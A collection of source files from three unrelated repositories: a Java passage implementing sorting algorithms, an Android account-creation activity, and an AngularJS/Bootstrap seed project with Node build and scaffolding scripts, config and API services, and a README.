for (int begin = first; begin < first + tmp; begin++) {
incrementalInsertionSort(a, begin, last, tmp);
}
}
}
}
private static <T extends Comparable<? super T>> void incrementalInsertionSort(T[] a, int first, int last, int
space) {
int unsorted, index;
for (unsorted = first + space; unsorted <= last; unsorted = unsorted + space) {
T firstUnsorted = a[unsorted];
for (index = unsorted - space; (index >= first) && (firstUnsorted.compareTo(a[index]) < 0); index = index -
space) {
a[index + space] = a[index];
}
a[index + space] = firstUnsorted;
}
}
/**
* insertion sort
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void insertionSort(T[] a, int n) {
insertionSort(a, 0, n - 1);
}
private static <T extends Comparable<? super T>> void insertionSort(T[] a, int first, int last) {
// for (int i = first + 1; i <= last; i++) {
// T firstUnsorted = a[i];
// insertInOrder(firstUnsorted, a, first, i);
// }
if (first < last) {
// T firstUnsorted = a[first + 1];
// insertInOrder(firstUnsorted, a, 0, first);
// insertionSort(a,first+1,last);
insertionSort(a, first, last - 1);
insertInOrder(a[last], a, first, last - 1);
}
}
private static <T extends Comparable<? super T>> void insertInOrder(T element, T[] a, int first, int last) {
// for (int i = last; i >= first; i--) {
// if (element.compareTo(a[i]) < 0) {
// a[i + 1] = a[i];
// } else {
// a[i + 1] = element;
// break;
// }
// }
// int index = last;
// while (index >= first && element.compareTo(a[index]) < 0) {
// a[index + 1] = a[index];
// index--;
// }
// a[index + 1] = element;
if (element.compareTo(a[last]) >= 0) {
a[last + 1] = element;
} else {
a[last + 1] = a[last];
if (first < last) {
insertInOrder(element, a, first, last - 1);
} else {
a[last] = element;
}
}
}
/**
* 优化的选择排序,每次选择中,选出最大值与最小值,分别与数组的首尾元素交换位置
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void selectionSort2(T[] a, int n) {
selectionSort2(a, 0, n - 1);
}
private static <T extends Comparable<? super T>> void selectionSort2(T[] a, int first, int last) {
if (last > first) {
int min = first;
int max = first;
for (int i = first + 1; i < last; i++) {
if (a[i].compareTo(a[min]) < 0) {
min = i;
} else if (a[i].compareTo(a[max]) > 0) {
max = i;
}
}
swap(a, first, min);
if (first == max) {
max = min;
}
swap(a, last, max);
selectionSort2(a, first + 1, last - 1);
}
}
/**
* selection sort
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void selectionSort(T[] a, int n) {
// for (int index = 0; index < n - 1; index++) {
// int indexOfNextSmallest = getIndexOfSmallest(a, index, n - 1);
// swap(a, index, indexOfNextSmallest);
// }
selectionSort(a, 0, n - 1);
}
private static <T extends Comparable<? super T>> void selectionSort(T[] a, int first, int last) {
if (first < last) {
int indexOfNextSmallest = getIndexOfSmallest(a, first, last);
swap(a, first, indexOfNextSmallest);
selectionSort(a, ++first, last);
}
}
/**
 * Returns the index of the smallest element in a[first..last].
 * Ties are resolved in favor of the earliest index.
 */
private static <T extends Comparable<? super T>> int getIndexOfSmallest(T[] a, int first, int last) {
int smallest = first;
for (int i = first + 1; i <= last; i++) {
if (a[i].compareTo(a[smallest]) < 0) {
smallest = i;
}
}
return smallest;
}
/**
 * Checks whether the given array is sorted in non-decreasing order
 * (smaller elements on the left).
 *
 * @param a   the array to inspect
 * @param <T> element type, comparable to its supertype
 * @return {@code true} if every adjacent pair is ordered, else {@code false}
 */
public static <T extends Comparable<? super T>> boolean isSorted(T[] a) {
for (int i = 0; i + 1 < a.length; i++) {
if (a[i].compareTo(a[i + 1]) > 0) {
return false;
}
}
return true;
}
/**
 * Least-significant-digit radix sort of a[first..last], O(maxDigits * n).
 * Each pass distributes elements into ten buckets by the current decimal
 * digit and copies them back in bucket order (stable per pass).
 *
 * Note: only NON-NEGATIVE integers are supported — a negative element
 * would produce a negative digit value and an
 * ArrayIndexOutOfBoundsException.
 *
 * @param a         the array containing the range to sort
 * @param first     index of the first element of the range (inclusive)
 * @param last      index of the last element of the range (inclusive)
 * @param maxDigits decimal digit count of the largest element (at most 10 for int)
 */
public static void radixSort(int[] a, int first, int last, int maxDigits) {
int length = last - first + 1;
int[][] buckets = new int[10][length];
int[] bucketIndex = new int[10]; // next free slot within each bucket
int divisor = 1; // 10^digit, tracked incrementally instead of (int) Math.pow
for (int digit = 0; digit < maxDigits; digit++) {
// Distribute each element into the bucket for its current digit.
for (int index = first; index <= last; index++) {
int element = a[index];
int digitValue = (element / divisor) % 10;
buckets[digitValue][bucketIndex[digitValue]++] = element;
}
// Copy the buckets back into the range, preserving bucket order.
int index = first;
for (int i = 0; i < 10; i++) {
for (int j = 0; j < bucketIndex[i]; j++) {
a[index++] = buckets[i][j];
}
}
// Only the fill counts need resetting; bucket contents are simply
// overwritten next pass (the original reallocated both arrays).
java.util.Arrays.fill(bucketIndex, 0);
divisor *= 10;
}
}
}
<file_sep># data-structures-java-demo
| b363268b6b6bd4651684092459ceeca9125f5f05 | [
"Markdown",
"Java"
] | 16 | Java | frankdong80/data-structures-java-demo | 4b0d276870edd380347deb199bbdfdb8e97c8a5c | 0127a3f50b3468740b2875d0e312c7069b3cc774 |
refs/heads/master | <repo_name>AlexanderDWz/WGFinder<file_sep>/app/src/main/java/hs/karlsruhe/wgfinder/Account_erstellen.java
package hs.karlsruhe.wgfinder;
import android.content.Intent;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.view.Menu;
import android.view.View;
/**
 * Activity for creating a new user account ("Account erstellen").
 */
public class Account_erstellen extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
// Bind the account-creation layout and set the action-bar title.
setContentView(R.layout.activity_account_erstellen);
setTitle("Account erstellen");
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
// Reuses the shared main menu resource for this screen.
getMenuInflater().inflate(R.menu.menu_main, menu);
return true;
}
// Click handler (presumably wired via android:onClick in the layout —
// TODO confirm): navigates to MainActivity.
public void sendMessage(View view)
{
Intent intent = new Intent(this,MainActivity.class);
startActivity(intent);
}
}
| a897e304d2aec6d1fccec7179c24d3f657161c3b | [
"Java"
] | 1 | Java | AlexanderDWz/WGFinder | 1e88807d0fbcaa1b3a7e70000a7ef19b875340ae | 996bf11fa17f153520bdae47014fcc81e9abaeca |
refs/heads/master | <repo_name>jls14/bootstrap-angular-seed<file_sep>/scripts/build.js
// Build script: minifies the JS/CSS files referenced from src/index.html
// into dist/bundle.js / dist/bundle.css, rewrites index.html to reference
// the bundles, and copies the remaining template HTML files into dist/.
console.log("start build");
var fs = require('fs');
var path = require('path');
var copy = require('recursive-copy');
var uglify = require("uglify-js");
var execSync = require('child_process').execSync;
var cleanCss = new (require('clean-css'))({});
var filePath = path.join(__dirname, '../src/index.html');
// Start from a clean dist directory.
if(fs.existsSync(path.join(__dirname, '../dist'))){
    execSync('rm -rf ' + path.join(__dirname, '../dist'));
}
fs.mkdirSync(path.join(__dirname, '../dist'));
var bundleJs = path.join(__dirname, '../dist/bundle.js');
var bundleCss = path.join(__dirname, '../dist/bundle.css');
var index = path.join(__dirname, '../dist/index.html');
// BUG FIX: the async fs.writeFile(file, data, encoding=...) calls had no
// callback (a TypeError on modern Node) and leaked an implicit global
// `encoding`; use the sync API so the files exist before the
// appendFileSync calls below run.
fs.writeFileSync(index, '', 'utf8');
fs.writeFileSync(bundleJs, '', 'utf8');
fs.writeFileSync(bundleCss, '', 'utf8');
fs.readFileSync(filePath).toString().split('\n').forEach(function(line){
    if(/script\s*src="\.\.\/(.*?)"/.test(line)){
        // <script src="../..."> — asset path is relative to the repo root.
        var exec = /script\s*src="\.\.\/(.*?)"/.exec(line);
        var minJs = uglify.minify(fs.readFileSync("" + exec[1]).toString()).code;
        // Terminate each minified file with ';' so concatenation cannot
        // merge the last statement of one file into the next.
        fs.appendFileSync(bundleJs, minJs + ';\n');
    } else if(/script\s*src="(.*?)"/.test(line)) {
        // <script src="..."> — asset path is relative to src/.
        var exec = /script\s*src="(.*?)"/.exec(line);
        var minJs = uglify.minify(fs.readFileSync("src/" + exec[1]).toString()).code;
        fs.appendFileSync(bundleJs, minJs + ';\n');
    } else if(/link\s*href="\.\.\/(.*?)"/.test(line)){
        var exec = /link\s*href="\.\.\/(.*?)"/.exec(line);
        var minCss = cleanCss.minify(fs.readFileSync(exec[1]).toString()).styles;
        fs.appendFileSync(bundleCss, minCss);
    } else if(/link\s*href="(.*?)"/.test(line)) {
        var exec = /link\s*href="(.*?)"/.exec(line);
        var minCss = cleanCss.minify(fs.readFileSync("src/" + exec[1]).toString()).styles;
        fs.appendFileSync(bundleCss, minCss);
    } else {
        // BUG FIX: re-append the newline that split('\n') removed so the
        // generated index.html is not collapsed onto a single line.
        fs.appendFileSync(index, line + '\n');
    }
    if(/<head>/.test(line)){
        // Inject references to the generated bundles right after <head>.
        fs.appendFileSync(index, "<script src=\"bundle.js\"></script>");
        fs.appendFileSync(index, "<link href=\"bundle.css\" rel=\"stylesheet\" />");
    }
});
// Copy every template HTML file (except index.html) alongside the bundles.
copy('src', 'dist', {filter: ['**/**.html', '!**/index.html']}, function(error, results) {
    if (error) {
        console.error('Copy failed: ' + error);
    } else {
        console.info(results);
        console.log("It's Alive!");
    }
});
<file_sep>/src/components/navbar.component/navbar.component.js
// AngularJS module for the navigation bar: registers the navbarComponent
// directive (template + NavbarController, aliased as navbarCtrl).
(function(){
'use strict'
angular
.module('navbar.component', [])
.directive('navbarComponent', [function(){
return {
templateUrl: "components/navbar.component/navbar.component.html",
controller: "NavbarController",
controllerAs: "navbarCtrl"
};
}])
// Placeholder controller — no behavior yet.
.controller('NavbarController', [function(){
}])
})()
<file_sep>/scripts/add-service.js
// Scaffolding script: generates src/services/<name>.service.js and
// registers its <script> tag in src/index.html.
// Usage: node scripts/add-service.js --name <name>
var name = process.argv[process.argv.indexOf("--name") + 1];
var serviceName = name + ".service";
// Build the PascalCase service identifier from the dot-separated name,
// e.g. "my.api" -> "MyApi".
// BUG FIX: the original appended name.substring(1) for every segment,
// producing garbage for dotted names.
var scName = "";
name.split('.').forEach(function(segment){
    scName += segment.charAt(0).toUpperCase() + segment.substring(1);
});
var fs = require('fs');
var path = require('path');
var execSync = require('child_process').execSync;
var index = path.join(__dirname, '../src/index.html');
var index2 = path.join(__dirname, '../src/index2.html');
var serviceDir = path.join(__dirname, '../src/services');
var serviceJs = serviceDir + '/' + serviceName + '.js';
// BUG FIX: mkdirSync threw EEXIST when src/services already existed.
if(!fs.existsSync(serviceDir)){
    fs.mkdirSync(serviceDir);
}
// BUG FIX: the async fs.writeFile calls had no callback (a TypeError on
// modern Node) and raced the synchronous reads below; use the sync API.
fs.writeFileSync(serviceJs, `
(function(){
'use strict'
angular
.module('${serviceName}', [])
.service('${scName}Service', [function(){
var $svc=this;
}]);
})();
`, 'utf8');
var isAdded = false;
fs.writeFileSync(index2, '', 'utf8');
// Rewrite index.html line by line, inserting the new <script> tag either
// at the "--services--" marker or, failing that, just before </head>.
fs.readFileSync(index).toString().split('\n').forEach(function(line){
    if(/--services--/.test(line) && !isAdded){
        isAdded = true;
        fs.appendFileSync(index2, line + "\n");
        fs.appendFileSync(index2, "<script src=\"services/" + serviceName + ".js\"></script>\n");
    }
    else if(/\/head/.test(line) && !isAdded){
        isAdded = true;
        fs.appendFileSync(index2, "<script src=\"services/" + serviceName + ".js\"></script>\n");
        fs.appendFileSync(index2, line + "\n");
    }
    else{
        fs.appendFileSync(index2, line + "\n");
    }
});
execSync('mv -f ' + index2 + ' ' + index);
// BUG FIX: was a double-quoted string, so ${serviceName} never interpolated.
console.log(`dont forget to add ${serviceName} to app.js modules`);
<file_sep>/README.md
# bootstrap-angular-seed
A minimal Angular seed project with only Angular and Bootstrap as dependencies, plus a simple build script written in pure Node.js.
<file_sep>/src/services/config.service.js
// AngularJS service exposing runtime configuration. Optionally loads
// config.json and build.json from the app root at startup; until (or
// unless) those requests succeed, the defaults below are used.
(function(){
'use strict'
angular
.module('config.service', [])
.service('ConfigService', ['$http',function($http){
var $svc=this;
// Default build metadata; the timestamp doubles as a version stamp.
$svc.build = {"version": (new Date()).getTime()};
// Default (empty) runtime configuration.
$svc.config = {};
// Returns the current build version (default or loaded from build.json).
$svc.getVersion = function(){
return $svc.build.version;
};
// Overlay config.json if the server provides it (missing file is ignored).
$http.get("./config.json")
.then(
function(promise){
$svc.config = promise.data;
angular.ConfigService=$svc;
}
);
// Overlay build.json if the server provides it (missing file is ignored).
$http.get("./build.json")
.then(
function(promise){
$svc.build = promise.data;
angular.ConfigService=$svc;
}
);
// Also published on the angular global for access outside DI —
// NOTE(review): unconventional; confirm consumers before removing.
angular.ConfigService=$svc;
}]);
})();
<file_sep>/src/app.js
// Root AngularJS module: declares the app's service/component/view module
// dependencies and routes any unknown path to /main.
(function(){
'use strict'
angular
.module('app', [
'ngRoute',
'ngAnimate',
'config.service',
'api.service',
'navbar.component',
'main.view'
])
.config(['$locationProvider', '$routeProvider', function($locationProvider, $routeProvider) {
// Fallback route; individual view modules register their own routes.
$routeProvider.otherwise({redirectTo: '/main'});
}]);
})();
<file_sep>/scripts/add-component.js
// Scaffolding script: generates src/components/<name>.component/ with JS,
// CSS and HTML stubs and registers them in src/index.html.
// Usage: node scripts/add-component.js --name <name>
var name = process.argv[process.argv.indexOf("--name") + 1];
var viewName = name + ".component";
// PascalCase base identifier, e.g. "nav.bar" -> "NavBar".
// BUG FIX: the original appended name.substring(1) for every dot segment,
// producing garbage for dotted names.
var ucName = "";
name.split('.').forEach(function(segment){
    ucName += segment.charAt(0).toUpperCase() + segment.substring(1);
});
// camelCase alias used in the controllerAs expression ("navBar").
var abbrevName = ucName.charAt(0).toLowerCase() + ucName.substring(1);
// BUG FIX: compName was declared but never assigned, so the directive was
// registered under the empty string. Use the camelCase form of the element
// name (<nav-bar-component> -> navBarComponent).
var compName = abbrevName + 'Component';
var fs = require('fs');
var path = require('path');
var execSync = require('child_process').execSync;
var index = path.join(__dirname, '../src/index.html');
var index2 = path.join(__dirname, '../src/index.2.html');
var viewDir = path.join(__dirname, '../src/components/' + viewName);
var viewCss = viewDir + '/' + viewName + '.css';
var viewJs = viewDir + '/' + viewName + '.js';
var viewHtml = viewDir + '/' + viewName + '.html';
fs.mkdirSync(viewDir);
// BUG FIX: the async fs.writeFile calls had no callback (a TypeError on
// modern Node) and leaked an implicit global `encoding`; use the sync API.
fs.writeFileSync(viewCss, '', 'utf-8');
// BUG FIX: String.replace('.', '-') only replaced the first dot; use
// split/join so every dot becomes a dash in the CSS class name.
fs.writeFileSync(viewHtml, `
<div class="${viewName.split('.').join('-')}">
<h1>${ucName}</h1>
</div>
`, 'utf-8');
fs.writeFileSync(viewJs, `
(function(){
'use strict'
angular
.module('${viewName}', ['ngRoute', 'ngAnimate', 'ui.bootstrap'])
.directive('${compName}', [function(){
return {
restrict: 'E',
controller: '${ucName}ComponentController',
controllerAs: '${abbrevName}cCtrl',
templateUrl: 'components/${viewName}/${viewName}.html'
};
}])
.controller('${ucName}ComponentController', [function(){
var $ctrl=this;
}]);
})();
`, 'utf-8');
var isAdded = false;
fs.writeFileSync(index2, '', 'utf8');
// BUG FIX: the generated <script>/<link> tags pointed at the project root,
// but the files live under components/<viewName>/ (cf. add-service.js,
// which correctly prefixes "services/").
var scriptTag = "<script src=\"components/" + viewName + "/" + viewName + ".js\"></script>\n";
var linkTag = "<link href=\"components/" + viewName + "/" + viewName + ".css\" rel=\"stylesheet\" />\n";
// Rewrite index.html line by line, inserting the new tags either at the
// "--components--" marker or, failing that, just before </head>.
fs.readFileSync(index).toString().split('\n').forEach(function(line){
    if(/--components--/.test(line) && !isAdded){
        fs.appendFileSync(index2, line + "\n");
        isAdded = true;
        fs.appendFileSync(index2, scriptTag);
        fs.appendFileSync(index2, linkTag);
    }
    else if(/\/head/.test(line) && !isAdded){
        isAdded = true;
        fs.appendFileSync(index2, scriptTag);
        fs.appendFileSync(index2, linkTag);
        fs.appendFileSync(index2, line + "\n");
    }
    else{
        fs.appendFileSync(index2, line + "\n");
    }
});
execSync('mv -f ' + index2 + ' ' + index);
// BUG FIX: the original line had an unterminated string literal — a
// SyntaxError that prevented the whole script from running.
console.log(`dont forget to add ${viewName} to app.js modules`);
<file_sep>/src/views/main.view/main.view.js
// AngularJS "main" view module: registers the /main route with its
// template and controller (aliased as mainCtrl).
(function(){
'use strict'
angular
.module('main.view', ['ngRoute', 'ngAnimate', 'ui.bootstrap', 'config.service'])
.config(['$routeProvider', function($routeProvider) {
$routeProvider.when('/main', {
templateUrl: 'views/main.view/main.view.html',
controller: 'MainController',
controllerAs: 'mainCtrl'
});
}])
// Placeholder controller — no behavior yet.
.controller('MainController', [function(){
var $ctrl=this;
}]);
})()
<file_sep>/src/services/api.service.js
// AngularJS API service stub — placeholder for future $http-backed calls.
(function(){
'use strict'
angular
.module('api.service', [])
.service('ApiService', ['$http', function($http){
}]);
})()
| d54ce7fa0647e18243e7d56bb16d775657a3e3e6 | [
"JavaScript",
"Markdown"
] | 9 | JavaScript | jls14/bootstrap-angular-seed | f1a46acf6ca5814a5a1f14bb2998a6b127537283 | 2480f9466cecf5a3a291033c115a495184c72ac0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.